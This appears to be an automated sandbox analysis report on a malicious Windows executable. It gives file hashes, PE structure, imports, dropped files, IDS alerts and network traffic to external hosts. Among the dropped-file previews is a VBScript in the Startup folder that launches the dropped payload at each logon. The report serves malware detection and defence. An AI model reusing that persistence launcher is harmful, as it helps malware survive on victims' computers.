                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):2382336
                                                                      Entropy (8bit):7.7164788849497
                                                                      Encrypted:false
                                                                      SSDEEP:49152:fu0c++OCvkGs9FacSc9fbFtWR1+0o8fyNq6UQruXZO1KgRudguKB+kyo3zJ57O1Y:GB3vkJ9Qc9jFs/QzNDogRudgLB/ySzry
                                                                      MD5:A031DA4BAE8BD9CF87C071C94F67D21B
                                                                      SHA1:29146F6E8D3107EB8CC5B362B15D8E57C3F815FB
                                                                      SHA-256:D746BF8EBC1BC19872AAFE6329FD3865332165C7EF477901E5CDF76E88E9931F
                                                                      SHA-512:BD84AC0D0D3A846B5EBA97D7A440F79034BDA7B381F836966561175E98AED3D87E194441DA0A19836C6ACB3EC8293970EFECB46767F303FD12956A0DB9FB0B42
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 66%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L.....Wg.........."..........x.......}............@...........................$.......$...@...@.......@.....................L...|....p.......................P$..q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc........p......................@..@.reloc...q...P$..r....#.............@..B........................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\error_log.txt

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):354
                                                                      Entropy (8bit):4.519501589447018
                                                                      Encrypted:false
                                                                      SSDEEP:6:Ud6SdLGL29duGjjaAuN723fpdLSAz9lqpV+RM0Md6SdLXmPduGjjaAuN723fpdLk:GLC29dJjjLuaxdLvupV2uLwdJjjLuaxm
                                                                      MD5:C5574CA68C2AFD29DCDB25A3D5163EB2
                                                                      SHA1:B652555E6C4605C0D11CD5DD0E5F99DD893DCE69
                                                                      SHA-256:B705EA006DB84FD7976EE95C1925731D45C751C18ABE0FDDFD9D48469C0B00BF
                                                                      SHA-512:17C43F9AB54F2FAE23C9644CFAEFCED85345FB27BEF5748B78CF250256C6F17D59406809D575DF4DD12A6A25E1A58F0238792B1C197EB76D3F709363878CE37C
                                                                      Malicious:false
                                                                      Preview:Failed to extract resource EmbeddedExe1: The process cannot access the file 'C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe' because it is being used by another process..Failed to extract resource EmbeddedExe2: The process cannot access the file 'C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe' because it is being used by another process..

                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lecheries.vbs

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\konked\lecheries.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):278
                                                                      Entropy (8bit):3.3831375198427964
                                                                      Encrypted:false
                                                                      SSDEEP:6:DMM8lfm3OOQdUfclzXUEZ+lX1Ol+Rakm6nriIM8lfQVn:DsO+vNlDQ1rU4mA2n
                                                                      MD5:9313627D4F5A81392FF50BD3E3260432
                                                                      SHA1:1B513FC79C158671E37B2E7003F14A960961B3A0
                                                                      SHA-256:544FF47DA83650A68551E7C6DB44ABC750F161B5A307DAFB58D467CD7AF729FD
                                                                      SHA-512:6CC09C04BEE63B2A27FB30F17FC04D6CC3CDB5B7C40D2DC2E398FCF6F724AC40022126084CCF2DC8692DBDEA112F2F0C78211EE5A8A360709B615A3346ED6E9D
                                                                      Malicious:true
                                                                      Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.k.o.n.k.e.d.\.l.e.c.h.e.r.i.e.s...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):7.7164788849497
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:8kDIr4ZdNj.exe
                                                                      File size:2'382'336 bytes
                                                                      MD5:a031da4bae8bd9cf87c071c94f67d21b
                                                                      SHA1:29146f6e8d3107eb8cc5b362b15d8e57c3f815fb
                                                                      SHA256:d746bf8ebc1bc19872aafe6329fd3865332165c7ef477901e5cdf76e88e9931f
                                                                      SHA512:bd84ac0d0d3a846b5eba97d7a440f79034bda7b381f836966561175e98aed3d87e194441da0a19836c6acb3ec8293970efecb46767f303fd12956a0db9fb0b42
                                                                      SSDEEP:49152:fu0c++OCvkGs9FacSc9fbFtWR1+0o8fyNq6UQruXZO1KgRudguKB+kyo3zJ57O1Y:GB3vkJ9Qc9jFs/QzNDogRudgLB/ySzry
                                                                      TLSH:0BB5F122A3DEC361CB769173BF6AB7016E7F78614630B95B2F840D7DA910171222D7A3
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                                      File Icon

                                                                      Icon Hash:aaf3e3e3938382a0

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x427dcd
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x67579319 [Tue Dec 10 01:02:17 2024 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:5
                                                                      OS Version Minor:1
                                                                      File Version Major:5
                                                                      File Version Minor:1
                                                                      Subsystem Version Major:5
                                                                      Subsystem Version Minor:1
                                                                      Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      call 00007F2048F599EAh
                                                                      jmp 00007F2048F4C7B4h
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      push edi
                                                                      push esi
                                                                      mov esi, dword ptr [esp+10h]
                                                                      mov ecx, dword ptr [esp+14h]
                                                                      mov edi, dword ptr [esp+0Ch]
                                                                      mov eax, ecx
                                                                      mov edx, ecx
                                                                      add eax, esi
                                                                      cmp edi, esi
                                                                      jbe 00007F2048F4C93Ah
                                                                      cmp edi, eax
                                                                      jc 00007F2048F4CC9Eh
                                                                      bt dword ptr [004C31FCh], 01h
                                                                      jnc 00007F2048F4C939h
                                                                      rep movsb
                                                                      jmp 00007F2048F4CC4Ch
                                                                      cmp ecx, 00000080h
                                                                      jc 00007F2048F4CB04h
                                                                      mov eax, edi
                                                                      xor eax, esi
                                                                      test eax, 0000000Fh
                                                                      jne 00007F2048F4C940h
                                                                      bt dword ptr [004BE324h], 01h
                                                                      jc 00007F2048F4CE10h
                                                                      bt dword ptr [004C31FCh], 00000000h
                                                                      jnc 00007F2048F4CADDh
                                                                      test edi, 00000003h
                                                                      jne 00007F2048F4CAEEh
                                                                      test esi, 00000003h
                                                                      jne 00007F2048F4CACDh
                                                                      bt edi, 02h
                                                                      jnc 00007F2048F4C93Fh
                                                                      mov eax, dword ptr [esi]
                                                                      sub ecx, 04h
                                                                      lea esi, dword ptr [esi+04h]
                                                                      mov dword ptr [edi], eax
                                                                      lea edi, dword ptr [edi+04h]
                                                                      bt edi, 03h
                                                                      jnc 00007F2048F4C943h
                                                                      movq xmm1, qword ptr [esi]
                                                                      sub ecx, 08h
                                                                      lea esi, dword ptr [esi+08h]
                                                                      movq qword ptr [edi], xmm1
                                                                      lea edi, dword ptr [edi+08h]
                                                                      test esi, 00000007h
                                                                      je 00007F2048F4C995h
                                                                      bt esi, 03h
                                                                      jnc 00007F2048F4C9E8h

                                                                      Rich Headers

                                                                      Programming Language:
                                                                      • [ASM] VS2013 build 21005
                                                                      • [ C ] VS2013 build 21005
                                                                      • [C++] VS2013 build 21005
                                                                      • [ C ] VS2008 SP1 build 30729
                                                                      • [IMP] VS2008 SP1 build 30729
                                                                      • [ASM] VS2013 UPD4 build 31101
                                                                      • [RES] VS2013 build 21005
                                                                      • [LNK] VS2013 UPD4 build 31101

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x17d114.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x2450000x711c.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .rsrc0xc70000x17d1140x17d200c22d5d9f8b9a9a6a3df977f13da4e14fFalse0.9829939119383404data7.989325897711083IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .reloc0x2450000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                      RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                      RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                      RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                      RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                      RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                      RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                      RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                      RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                      RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                      RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                      RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                      RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                                      RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                      RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                                      RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                                      RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                      RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                      RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                      RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                      RT_RCDATA0xcf7b80x1743dcdata1.0003108978271484
                                                                      RT_GROUP_ICON0x243b940x76dataEnglishGreat Britain0.6610169491525424
                                                                      RT_GROUP_ICON0x243c0c0x14dataEnglishGreat Britain1.25
                                                                      RT_GROUP_ICON0x243c200x14dataEnglishGreat Britain1.15
                                                                      RT_GROUP_ICON0x243c340x14dataEnglishGreat Britain1.25
                                                                      RT_VERSION0x243c480xdcdataEnglishGreat Britain0.6181818181818182
                                                                      RT_MANIFEST0x243d240x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                      Imports

                                                                      DLLImport
                                                                      WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                      VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                      COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                      MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                      WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                      PSAPI.DLLGetProcessMemoryInfo
                                                                      IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                      USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                      UxTheme.dllIsThemeActive
                                                                      KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                      USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                      GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                      COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                      ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                      SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                      ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                      OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                                      Possible Origin

                                                                      Language of compilation systemCountry where language is spokenMap
                                                                      EnglishGreat Britain

                                                                      Network Behavior

                                                                      Suricata IDS Alerts

                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2025-01-10T16:46:54.328980+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649710193.122.6.16880TCP
                                                                      2025-01-10T16:46:55.436814+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649710193.122.6.16880TCP
                                                                      2025-01-10T16:46:56.002743+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649713104.21.16.1443TCP
                                                                      2025-01-10T16:46:56.780575+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649714193.122.6.16880TCP
                                                                      2025-01-10T16:46:58.077474+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649726193.122.6.16880TCP
                                                                      2025-01-10T16:46:58.651903+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649729104.21.16.1443TCP
                                                                      2025-01-10T16:46:59.385176+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649734193.122.6.16880TCP
                                                                      2025-01-10T16:46:59.948839+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649740104.21.16.1443TCP
                                                                      2025-01-10T16:47:00.702469+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649746193.122.6.16880TCP
                                                                      2025-01-10T16:47:01.999344+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649754193.122.6.16880TCP
                                                                      2025-01-10T16:47:02.697410+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649759104.21.16.1443TCP
                                                                      2025-01-10T16:47:03.405608+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649765193.122.6.16880TCP

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jan 10, 2025 16:46:53.441190958 CET4971080192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:46:53.446108103 CET8049710193.122.6.168192.168.2.6
                                                                      Jan 10, 2025 16:46:53.446178913 CET4971080192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:46:53.446540117 CET4971080192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:46:53.452658892 CET8049710193.122.6.168192.168.2.6
                                                                      Jan 10, 2025 16:46:54.084300995 CET8049710193.122.6.168192.168.2.6
                                                                      Jan 10, 2025 16:46:54.092763901 CET4971080192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:46:54.097635984 CET8049710193.122.6.168192.168.2.6
                                                                      Jan 10, 2025 16:46:54.278549910 CET8049710193.122.6.168192.168.2.6
                                                                      Jan 10, 2025 16:46:54.328979969 CET4971080192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:46:54.385951042 CET49711443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:46:54.386007071 CET44349711104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:46:54.386076927 CET49711443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:46:54.433713913 CET49711443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:46:54.433739901 CET44349711104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:46:54.923721075 CET44349711104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:46:54.923836946 CET49711443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:46:54.936706066 CET49711443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:46:54.936733007 CET44349711104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:46:54.937068939 CET44349711104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:46:54.983701944 CET49711443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:46:55.041376114 CET49711443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:46:55.083358049 CET44349711104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:46:55.163240910 CET44349711104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:46:55.163331032 CET44349711104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:46:55.163410902 CET49711443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:46:55.195090055 CET49711443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:46:55.198730946 CET4971080192.168.2.6193.122.6.168
                                                                      Jan 10, 2025 16:46:55.203557968 CET8049710193.122.6.168192.168.2.6
                                                                      Jan 10, 2025 16:46:55.384382010 CET8049710193.122.6.168192.168.2.6
                                                                      Jan 10, 2025 16:46:55.386607885 CET49713443192.168.2.6104.21.16.1
                                                                      Jan 10, 2025 16:46:55.386640072 CET44349713104.21.16.1192.168.2.6
                                                                      Jan 10, 2025 16:46:55.386732101 CET49713443192.168.2.6104.21.16.1
